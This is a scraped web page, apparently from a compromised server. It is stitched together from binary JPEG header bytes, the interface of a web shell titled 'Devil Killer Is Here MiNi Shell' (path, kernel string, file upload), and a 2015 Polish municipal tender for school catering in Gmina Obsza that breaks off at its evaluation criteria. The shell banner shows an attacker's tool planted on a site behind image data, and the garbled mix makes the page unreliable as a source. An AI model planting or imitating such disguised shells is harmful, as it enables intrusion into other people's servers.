JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150806/201062-N-2015.html

<p class="kh_header"><b>Obsza: Dożywianie dzieci w szkołach na terenie gminy Obsza</b><br>
<b>Numer ogłoszenia: 201062 - 2015; data zamieszczenia: 06.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Obsza , Obsza 36, 23-413 Obsza, woj. lubelskie, tel. 84 6891002, faks 84 6891002.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> https://ugobsza.bip.lubelskie.pl/index.php?id=6</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dożywianie dzieci w szkołach na terenie gminy Obsza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa cateringu - przygotowanie i dostawa wyżywienia dla: a. Bajkowego Przedszkola w Gminie Obsza, Wola Obszańska 106a, 23-413 Obsza, w liczbie 40 dzieci w wieku przedszkolnym. b. Uczniów Szkoły Podstawowej im. Prymasa Tysiąclecia, ks. Kard. Stefana Wyszyńskiego w Babicach, Babice 108, 23-413 Obsza, w liczbie 100 dzieci w wieku przedszkolnym i szkolnym. c. Uczniów Szkoły Podstawowej w Obszy, Obsza 70a, 23-413 Obsza, w liczbie 56 dzieci w wieku przedszkolnym i szkolnym. d. Uczniów Szkoły Podstawowej im. Marii Konopnickiej w Olchowcu, Olchowiec 31, 23-413 Obsza, w liczbie 24 dzieci w wieku przedszkolnym i szkolnym. e. Uczniów Szkoły Podstawowej w Woli Obszańskiej, Wola Obszańska 106a, 23-413 Obsza, w liczbie 25 dzieci w wieku przedszkolnym i szkolnym. f. Uczniów Szkoły Podstawowej im. Jana Pawła II w Zamchu, Zamch 117, 23-413 Obsza, w liczbie 105 dzieci w wieku przedszkolnym i szkolnym. g. Gimnazjum w Obszy, Obsza 70a, 23-413 Obsza, w liczbie 100 dzieci w wieku 14 - 16 lat 2. Przedmiot zamówienia obejmuje: a. przygotowanie i dostawę dwóch posiłków dziennie tj.  śniadanie i obiad dwudaniowy (zupa i drugie danie) dla dzieci przedszkolnych w wieku 3 -  4 lat uczęszczających do Bajkowego Przedszkola w Gminie Obsza w okresie od 02.09.2015 do 30.06.2016  z wyjątkiem przerw w nauce dla grupy maksymalnie 40 dzieci. b. Przygotowanie i dostawę jednego posiłku dziennie tj. obiad (drugie danie lub zupa naprzemiennie) dla dzieci w wieku szkolnym i gimnazjalnym uczęszczających do Szkół Podstawowych i Gimnazjum z terenu Gminy Obsza w okresie od 02.09.2015 do 23.06.2016  z wyjątkiem przerw w nauce dla grupy maksymalnie 410 dzieci. Istnieje możliwość zmiany ilości dzieci korzystających z wyżywienia o maksymalnie 10%. 3. Posiłki powinny spełniać normy żywieniowe zgodne z polskimi normami żywieniowymi dla dzieci w wieku szkolnym, przedszkolnym i gimnazjalnym. Wykonawca zobowiązany jest do przygotowania posiłków o najwyższym standardzie, na bazie produktów najwyższej jakości i bezpieczeństwem zgodnie z normami HACCP. Posiłki muszą spełniać normy żywieniowe zalecane przez Instytut Matki i Dziecka dla danej grupy wiekowej. 4. Dla dzieci w wieku przedszkolnym: - posiłki składają się: ze śniadania (mleko 2% tłuszczu 200ml, bułka 50g, chleb mieszany 35g, masło lub margaryna 5g, wędlina 20g, ser 10g, płatki 20g, jaja ? szt., kakao 210 g, herbata 150g, pomidor 20g, ogórek 20g, nutella, dżem 10g), obiadu - zupa lub II danie i kompot (zupa 250ml z pieczywem; drugie danie: ziemniaki 80g, kasza 40g, makaron 70g, pierogi 150g, naleśniki 150g, ryż z jabłkami 60g, ryba 60g, gulasz 60g, pierś z kurczaka 50g, pulpety 50g, podudzie z kurczaka 60g, surówka 60g, kompot 200ml). Dla uczniów szkół podstawowych: posiłki składają się z II dania z kompotem (ziemniaki 100g, kasza 50g, makaron 70g, pierogi 200g, gulasz100g, schabowy 80g, łazanki 70g makaronu i 60gmięsa i kiełbasy, mielony 100g, potrawka z kurczaka 100g, ryba 120g, ryż z jabłkami 50g śmietana, do każdego drugiego dania surówka lub owoc) lub zup 500 ml z pieczywem 100g. 5. Wykonawca przedstawi Zamawiającemu do akceptacji projekt menu na każdy tydzień z 2-dniowym wyprzedzeniem. Zamawiający w terminie 1 dnia dokona akceptacji menu lub zgłosi uwagi, które Wykonawca ma obowiązek uwzględnić. Zamawiający nie dopuszcza, żeby ciągu 1 tygodnia wystąpiła powtarzalność tego samego rodzaju posiłku. 6. Posiłki dostarczane będą przez Wykonawcę własnym transportem w przenośnych termosach z utrzymaniem odpowiedniej temperatury posiłków. O czystość termosów dbać będzie dostawca posiłków. W gestii Wykonawcy będzie też zapewnienie jednorazowych naczyń i sztućców dla każdego dziecka, które korzystać będzie z wyżywienia. 7. Posiłki będą dostarczane do szkół w termosach od poniedziałku do piątku w godzinach: - 9:00 - 9:15 śniadanie dla Bajkowego Przedszkola w Gminie Obsza - 11:00 - 12:00 obiad dla Bajkowego Przedszkola, Szkół Podstawowych w Babicach, Obszy, Olchowcu, Woli Obszańskiej, Zamchu oraz Gimnazjum w Obszy 8. Zamawiający określa maksymalną wielkość przedmiotu zamówienia w okresie od 02.09.2015 tj. od daty zawarcia umowy do 30.06.2016 (z wyjątkiem przerw w nauce) - tj. maks. 190 dni, czyli maksymalnie 7600 śniadań, 85 500 obiadów jednodaniowych. 9. Wykonawca zobowiązany jest zapewnić ilość posiłków zgodnie z zapotrzebowaniem złożonym na dany dzień przez upoważnionego przedstawiciela Zamawiającego - Dyrektorów Szkół Podstawowych, Gimnazjum i Bajkowego Przedszkola bądź osobę przez niego upoważnioną do godz. 9:00 każdego dnia poprzedzającego wydanie posiłków. 10. Rozliczenie finansowe Wykonawcy usługi z Zamawiającym odbywać się będzie na podstawie faktycznie dostarczonych posiłków i ich ceny jednostkowej. Wykonawca nie będzie dochodził żadnych roszczeń w przypadku niewykorzystania całej kwoty określonej w § 4 ust. 1 umowy z powodu mniejszego faktycznego zapotrzebowania - do 40 % tej wartości. 11. Dzienny jadłospis obejmuje: Śniadanie: mleko w postaci zupy mlecznej (płatki owsiane, kasza jaglana, płatki pszenne, kasza manna) bądź napoju (np. bawarka, kakao, kawa zbożowa),  pieczywo mieszane: graham, pieczywo jasne - pszenne, pszenno-żytnie. Dodatkiem do pieczywa powinien być: twarożek, chuda wędlina oraz pasty np. z jaj bądź, gotowanej ryby. Niezbędnym dodatkiem do śniadania są warzywa np. pomidor, ogórek, papryka, sałata, szczypiorek, natka pietruszki. Dodatkiem powinien być również owoc, który Zamawiający poda dzieciom w formie przekąski. Do śniadania powinien być podawany również codziennie inny napój prócz mlecznego do wyboru np. herbata z cytryną, bądź herbata owocowa. Przykładowe menu na śniadania: - kakao na mleku (2%), kromka chleba graham, masło (82%), ser żółty, sałatka z sałaty i rzodkiewki, olej rzepakowy, herbata owocowa z cukrem, ? banana - Płatki owsiane na mleku (2%) (ewentualnie lekko posłodzone), kromka chleba pełnoziarnistego, masło (82%), chuda szynka wieprzowa, sałata, pomidor, herbata z cukrem i cytryną, jabłka - Musli z owocami suszonymi na mleku (2%), bułka grahamka, masło (82%) sałata, chuda szynka wołowa, papryka czerwona, szczypiorek, herbata owocowa z cukrem, mandarynka - Kasza jaglana na mleku (2%), z rodzynkami i cukrem, pieczywo mieszane z masłem i pastą (jajko ugotowane, cebula, rzodkiewka koncentrat pomidorowy), herbata z cytryną, kiwi, - Płatki kukurydziane z witaminami i żelazem na mleku (2%), pieczywo jasne, masło, pasta z sera białego (ser biały półtłusty, śmietana, rodzynki, cukier, cukier waniliowy), herbata owocowa z cukrem, gruszka. Obiad: zupa lub drugie danie: ziemniaki (lub zamiennie ryż, kasza, kopytka, makaron itp.)- dania mięsne np. sztuka mięsa, udziec z kurczaka, kotlet schabowy, stek z piersi z kurczaka, bitki wołowe, gulasz itp. Ryba (zalecane jest podawanie ryby przynajmniej raz w tygodniu), pierogi, naleśniki, knedle itp. - surówka (warzywa w formie gotowanej lub/i surowej), kompot lub napój. Przykładowe menu na obiady: - Zupa pomidorowa z włoszczyzną (zmiksowaną po ugotowaniu) i makaronem,  zaprawiona jogurtem naturalnym,  - Kotlet schabowy, ziemniaki duszone z masłem, surówka z kapusty białej, kompot gotowany - Zupa krem z zielonego groszku (świeżego lub mrożonego) z włoszczyzną i groszkiem ptysiowym zabielana jogurtem,  - Pałka drobiowa gotowana, ryż brązowy, marchewka gotowana, kompot gotowany - Zupa jarzynowa z ziemniakami, z estragonem posypana natką pietruszki, - Gołąbki w sosie pomidorowym, buraczki, ziemniaki gotowane, kompot - Zupa kalafiorowa z włoszczyzną i  lubczykiem, - Klopsiki rybne, ziemniaki gotowane, surówka z kapusty kiszonej, kompot gotowany - Krem pieczarkowy, - Pierogi z serem, kompot gotowany. Wykonawca zapewnia urozmaicenie jadłospisów oraz dostosuje rodzaje podawanych potraw do rangi posiłków (np. ryż z jabłkami, makaron z dżemem lub bułki na parze - nie mogą być daniem głównym na obiad). Menu powinno być ustalane tak, by zupa podawana była maksymalnie dwa razy w tygodniu, ale w dniach nie następujących po sobie. W jadłospisach, należy uwzględniać dodatki w postaci sezonowych warzyw i owoców oraz okazyjnie potrawy świąteczne. Dla  dzieci o specjalnych potrzebach żywieniowych np. dieta bezcukrowa, bezmleczna czy bezglutenowa, liczba dostarczanych diet winna odpowiadać liczbie diet określonych w zamówieniu składanym przez Zamawiającego. Informacja o diecie dziecka zostanie przekazana Wykonawcy w momencie uzyskania informacji od rodzica, w trakcie roku szkolnego najpóźniej na 1 dzień przed podaniem posiłku. 12. Posiłki musza być urozmaicone, na bazie produktów, zgodnych ze standardami HACCP.  Posiłki muszą spełniać wymogi żywienia zalecane przez Instytut  Matki i Dziecka dla dzieci przedszkolnych, nie mogą być przygotowywane z  półproduktów. Posiłki muszą być wysokiej jakości zarówno co do wartości odżywczej , gramatury jak i estetyki oraz uwzględniać polską tradycję kulinarną. Przy planowaniu posiłków należy uwzględniać wartość energetyczną oraz uwzględniać normy produktów. 13. Wykonawca zobowiązuje się do zupełnego wyeliminowania produktów  przetworzonych na poczet naturalnych i wartościowych produktów spożywczych. Wyklucza się serwowanie posiłków przygotowanych na bazie fastfood.  Zamawiający nie zezwala również na stosowanie w procesie żywienia następujących produktów: konserwy, produkty z glutaminianem sodu, parówki (z wyjątkiem kiełbas zawierających powyżej 80% mięsa), produkty masłopodobne i seropodobne, soki zagęszczone, mięso odkostnione mechanicznie oraz wędliny z dodatkiem preparatów białkowych (soja) i/lub skrobi modyfikowanej. Wyklucza sie sporządzanie jakichkolwiek potraw z proszku (z wyjątkiem budyniu kisielu i galaretek). 14. Do przygotowywania posiłków należy używać produktów wysokiej jakości i zawsze świeżych, posiadających aktualne terminy ważności, nabytych w źródłach  działających zgodnie z obowiązującymi przepisami sanitarnymi i higienicznymi; 15. Owoce i warzywa użyte do przygotowania posiłku musza być świeże lub mrożone. 16. Zupy muszą być gotowane na wywarze mięsno - warzywnym lub warzywnym. Zamawiający nie dopuszcza możliwości serwowania zup przygotowanych na bazie proszku lub wywaru z kości 17. W przypadku dań mięsnych należy serwować całe sztuki mięsa. Mięso przerobione (mielone) może się pojawiać sporadycznie zgodnie z zatwierdzonym jadłospisem. 18. Wykonawca dostarcza posiłki własnym transportem (samochód spełniający wymogi sanitarno techniczne do przewozu żywności). Posiłki dostarczane przez Wykonawcę winny być transportowane w odpowiednich, przeznaczonych do tego celu, pojemnikach termoizolacyjnych wykonanych z tworzywa zabezpieczających posiłki przed wylaniem oraz schłodzeniem: - Termosy jednoskładnikowe przeznaczone do transportu gorących posiłków (zupa, napoje); - Termosy wieloskładnikowe wypełnione pojemnikami, które występują w różnej konfiguracji i zapewniają dostarczenie poszczególnych części posiłków w odpowiednich temperaturach (minimalna temperatura zupy winna wynosić 75°C, drugiego dania 65°C, płynów 80°C, a maksymalna temperatura produktów zimnych (sałatki, surówki) 15°C. 19. Stan posiłków i sposób dowożenia musi spełniać wymogi Państwowej Stacji Sanitarno- Epidemiologicznej. Wykonawca do każdej dostawy produktów (co do których jest wymagane posiadanie tego dokumentu) dostarczy HDI - Handlowy Dokument Identyfikacyjny. Ponadto Wykonawca oświadcza, że towary i produkty  użyte w przedmiocie umowy spełniają normy polskie i inne wymagania określone dyrektywami europejskimi. 20. Wykonawca zobowiązany jest przygotowywać posiłki we własnej, spełniającej wymogi norm sanitarnych kuchni, a następnie dostarczyć i przekazać personelowi szkół. Sprawy związane z bezpośrednim wydawaniem posiłków dzieciom korzystającym z usług oddziałów przedszkolnych obciążają Zamawiającego. 21. Wykonawca zobowiązany jest dostarczyć wymaganą ilość posiłków (w tym diet) zgodną z zapotrzebowaniem złożonym na dany dzień z uwzględnieniem próbek do degustacji. 22. Wykonawca zobowiązany jest do odbioru termosów oraz pojemników, w których dostarczane będą posiłki każdego dnia tak, aby brudne termosy i pojemniki nie zostawały w przedszkolu do dnia następnego.  23. Na Wykonawcy ciąży obowiązek przechowywania próbek pożywienia. 24. W przypadku awarii lub innych nie przewidzianych zdarzeń Wykonawca jest zobowiązany zapewnić posiłki o nie gorszej jakości na swój koszt z innych źródeł. 25.	 W cenie oferty należy uwzględnić koszt posiłków standardowych i dietetycznych w razie konieczności. 26. Faktury VAT za realizację usługi będą wystawiane raz w miesiącu do 7 dnia każdego miesiąca za miesiąc poprzedni. 27. Wykonawca jest odpowiedzialny za zgodność z warunkami jakościowymi opisanymi dla przedmiotu zamówienia. W przypadku zgłoszenia uzasadnionej reklamacji Wykonawca jest zobowiązany do dostarczenia posiłku bez wad niezwłocznie, nie później jednak niż w ciągu 1 godziny od momentu powiadomienia - telefonicznie, za pomocą faksu lub pocztą elektroniczną,  przez Zamawiającego, niezależnie od kar umownych określonych w § 6 umowy.   28. Ustalenia i decyzje dotyczące wykonania przedmiotu zamówienia uzgadniane będą przez Wykonawcę z Dyrektorem Szkoły i/lub z ustanowionym przedstawicielem Zamawiającego. 29. Zamawiający nie ponosi odpowiedzialności za szkodę wyrządzoną przez Wykonawcę podczas wykonywania przedmiotu zamówienia. Personel Wykonawcy winien posiadać bieżące przeszkolenie z zakresu BHP oraz HACCP, a także aktualne książeczki zdrowia. Wykonawca odpowiada prawnie za żywienie dzieci przed Powiatowym Państwowym Inspektorem Sanitarnym w Biłgoraju. 30. Wykonawca oświadcza, że posiada pełne uprawnienia potrzebne do świadczenia usługi wydane przez Państwowego Powiatowego Inspektora Sanitarnego..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.52.40.00-9, 55.32.10.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium na wykonanie przedmiotu zamówienia w wysokości 4 000,00 zł (słownie: cztery tysiące zł). Wykonawca, który nie wniósł wadium, zostaje wykluczony z postępowania, a jego ofertę uznaje się za odrzuconą</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie zgodnie z formułą /spełnia-nie spełnia/ w oparciu o oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą wykazać i udokumentować, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości nie mniejszej niż 100 000,00 zł netto - jedna usługa, daty i miejsca wykonania,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie zgodnie z formułą /spełnia-nie spełnia/ w oparciu o oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie zgodnie z formułą /spełnia-nie spełnia/ w oparciu o oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku dokonana zostanie zgodnie z formułą /spełnia-nie spełnia/ w oparciu o oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty (zgodnie z treścią załącznika nr 1 do SIWZ);
2)	Formularz cenowy (załącznik nr 2 do SIWZ)
3)	Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z załączonych dokumentów (należy jednak załączyć dokumenty, z których wynikać będzie ciągłość 
i prawidłowość udzielonych pełnomocnictw - odpisy z właściwego rejestru);
4)	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia: - oświadczenie wymagane w §6 ust. 1, pkt 1 SIWZ oraz dokumenty wymagane w §6 ust. 1, pkt 2-6 SIWZ winny być złożone wspólnie przez wykonawców,
- dokumenty wymagane w §6 ust. 2 pkt. 1 - 4 oraz §6 ust. 4 SIWZ winien złożyć każdy wykonawca.
Przedsiębiorcy występujący wspólnie muszą upoważnić jednego spośród siebie jako przedstawiciela pozostałych - lidera do zaciągania zobowiązań i rozporządzenia prawem w sprawach związanych 
z przedmiotem postępowania, a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez pozostałych przedsiębiorców lub ich uprawnionych przedstawicieli.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
